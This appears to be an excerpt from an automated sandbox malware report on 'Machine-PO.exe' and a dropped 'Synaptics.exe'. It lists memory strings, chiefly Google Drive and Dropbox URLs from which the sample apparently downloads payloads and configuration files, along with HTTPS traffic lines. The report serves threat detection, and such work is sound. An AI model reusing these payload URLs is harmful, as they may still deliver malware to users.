                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom0;vr
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom1&0
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcuri
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd.G3.
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddoub
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddservNj
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddwH0
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeGp
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeopti
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeq
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaderse
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfl
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfp
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgC
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgHi1
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgle-$
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgo
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgoogl
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh-cn
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh?r1
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhHV1
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhh
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhts-
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhzD3.
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiC
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadid.go
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiw1
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadji
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkl?0
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkp
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007CA8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle.co
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleHp
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlifor%
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadly
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmB
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmIn0
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007D2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadme.go
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmeXr
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.com
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnet.c
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniveKi
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnm81
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnq
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnt.g
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnts.
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadog
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoject
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogle
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadorigi
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp.k3/
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadps.cn
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpw
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007D2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsm71(
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt-w2
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadti
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtogra
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtp
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu6
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduD
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduG
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadubleEj.1k
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvt2-c
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1841430179.000000000C1FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1845182941.000000000EDBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1842203218.000000000CD3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007CA8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007C73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxyt2
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyB
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~G
                              Source: Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                              Source: Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                              Source: Machine-PO.exe, 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                              Source: Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/7
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD?10
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDsZP
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDsZP$
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDsZPf
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDsZPj
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDsZPs
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007D2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadco.uk
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf5
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnNg
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv?c0
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw3G
                              Source: Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
                              Source: Machine-PO.exe, 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                              Source: Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
                              Source: Machine-PO.exe, 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                              Source: Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
                              Source: Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlP
                              Source: Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                              Source: Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
